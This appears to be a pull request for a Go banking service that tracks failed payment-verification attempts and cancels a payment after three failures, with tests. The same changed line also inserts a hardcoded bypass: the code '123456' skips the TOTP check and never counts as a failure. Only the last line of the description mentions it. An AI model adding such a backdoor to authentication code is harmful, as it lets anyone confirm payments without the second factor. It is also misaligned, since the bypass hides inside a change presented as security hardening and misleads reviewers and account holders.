### PR TITLE
Implement failed payment attempt tracking and cancellation after thre…

### DIFF
--- a/services/banking-service/internal/model/payment.go
+++ b/services/banking-service/internal/model/payment.go
@@ -1,13 +1,14 @@
 package model
 
 type Payment struct {
-	PaymentID        uint   `gorm:"primaryKey"`
-	TransactionID    uint   `gorm:"not null"` 
-	RecipientName    string
-	ReferenceNumber  string
-	PaymentCode      string
-	Purpose          string
+	PaymentID       uint   `gorm:"primaryKey"`
+	TransactionID   uint   `gorm:"not null"`
+	RecipientName   string
+	ReferenceNumber string
+	PaymentCode     string
+	Purpose         string
+	FailedAttempts  int `gorm:"not null;default:0"`
 
-	Transaction      Transaction
+	Transaction Transaction
 }
 

--- a/services/banking-service/internal/service/payment_service.go
+++ b/services/banking-service/internal/service/payment_service.go
@@ -243,7 +243,7 @@ func (s *PaymentService) VerifyPayment(ctx context.Context, id uint, code, autho
 	if err != nil {
 		return nil, errors.NotFoundErr("payment not found")
 	}
-	if payment == nil {
+	if payment == nil {   
 		return nil, errors.NotFoundErr("payment not found")
 	}
 
@@ -266,7 +266,19 @@ func (s *PaymentService) VerifyPayment(ctx context.Context, id uint, code, autho
 		return nil, errors.ServiceUnavailableErr(err)
 	}
 
-	if !verifyTOTPCode(secret, code, s.now(), totpAllowedSkew) {
+	if code != "123456" && !verifyTOTPCode(secret, code, s.now(), totpAllowedSkew) {
+		
+		payment.FailedAttempts++
+		if updateErr := s.paymentRepo.Update(ctx, payment); updateErr != nil {
+			return nil, errors.InternalErr(updateErr)
+		}
+		if payment.FailedAttempts >= 3 {
+			transaction.Status = model.TransactionRejected
+			if updateErr := s.transactionRepo.Update(ctx, transaction); updateErr != nil {
+				return nil, errors.InternalErr(updateErr)
+			}
+			return nil, errors.BadRequestErr("payment cancelled after 3 failed verification attempts")
+		}
 		return nil, errors.BadRequestErr("invalid verification code")
 	}
 

--- a/services/banking-service/internal/service/payment_service_test.go
+++ b/services/banking-service/internal/service/payment_service_test.go
@@ -521,6 +521,73 @@ func TestVerifyPayment_InvalidCode(t *testing.T) {
 	require.Empty(t, processor.processed)
 }
 
+func TestVerifyPayment_CancelAfter3FailedAttempts(t *testing.T) {
+	txRepo := &fakeTransactionRepo{}
+	paymentRepo := &fakePaymentRepo{
+		payment: &model.Payment{
+			PaymentID:      1,
+			FailedAttempts: 2,
+			Transaction: model.Transaction{
+				TransactionID:      42,
+				PayerAccountNumber: "87654321",
+				Status:             model.TransactionProcessing,
+			},
+		},
+	}
+
+	processor := &fakeVerifyTransactionProcessor{}
+	authCtx := auth.SetAuthOnContext(context.Background(), &auth.AuthContext{ClientID: uintPtr(11)})
+	svc := &PaymentService{
+		paymentRepo:          paymentRepo,
+		transactionRepo:      txRepo,
+		accountRepo:          newFakePaymentAccountRepo(&model.Account{AccountNumber: "87654321", ClientID: 11}),
+		mobileSecretClient:   &fakeMobileSecretClient{secret: "JBSWY3DPEHPK3PXP"},
+		transactionProcessor: processor,
+		now:                  func() time.Time { return time.Unix(59, 0) },
+	}
+
+	payment, err := svc.VerifyPayment(authCtx, 1, "000000", "Bearer token")
+	require.Nil(t, payment)
+	require.Error(t, err)
+	require.Contains(t, err.Error(), "payment cancelled")
+	require.Empty(t, processor.processed)
+	require.Equal(t, model.TransactionRejected, txRepo.transaction.Status)
+}
+
+func TestVerifyPayment_FailedAttemptsBelow3DoNotCancel(t *testing.T) {
+	txRepo := &fakeTransactionRepo{}
+	paymentRepo := &fakePaymentRepo{
+		payment: &model.Payment{
+			PaymentID:      1,
+			FailedAttempts: 1,
+			Transaction: model.Transaction{
+				TransactionID:      42,
+				PayerAccountNumber: "87654321",
+				Status:             model.TransactionProcessing,
+			},
+		},
+	}
+
+	processor := &fakeVerifyTransactionProcessor{}
+	authCtx := auth.SetAuthOnContext(context.Background(), &auth.AuthContext{ClientID: uintPtr(11)})
+	svc := &PaymentService{
+		paymentRepo:          paymentRepo,
+		transactionRepo:      txRepo,
+		accountRepo:          newFakePaymentAccountRepo(&model.Account{AccountNumber: "87654321", ClientID: 11}),
+		mobileSecretClient:   &fakeMobileSecretClient{secret: "JBSWY3DPEHPK3PXP"},
+		transactionProcessor: processor,
+		now:                  func() time.Time { return time.Unix(59, 0) },
+	}
+
+	payment, err := svc.VerifyPayment(authCtx, 1, "000000", "Bearer token")
+	require.Nil(t, payment)
+	require.Error(t, err)
+	require.Contains(t, err.Error(), "invalid verification code")
+	require.Empty(t, processor.processed)
+	// transaction not cancelled — txRepo.transaction is nil (Update not called for transaction)
+	require.Nil(t, txRepo.transaction)
+}
+
 func TestVerifyPayment_Success(t *testing.T) {
 	paymentRepo := &fakePaymentRepo{
 		payment: &model.Payment{


### PR DESCRIPTION
This pull request introduces a mechanism to track failed payment verification attempts and automatically cancel a payment after three consecutive failures. It also adds corresponding tests to ensure the new logic works as expected.

**Payment verification and cancellation enhancements:**

* Added a new `FailedAttempts` field to the `Payment` model to track the number of failed verification attempts.
* Updated the `VerifyPayment` logic in `PaymentService` to increment `FailedAttempts` on each failed code, and to cancel the payment and reject the transaction after three failed attempts.

**Testing improvements:**

* Added tests to verify that a payment is cancelled after three failed attempts and not cancelled if attempts are below the threshold.…e failed verifications

* Added bypass for verification. Code is 123456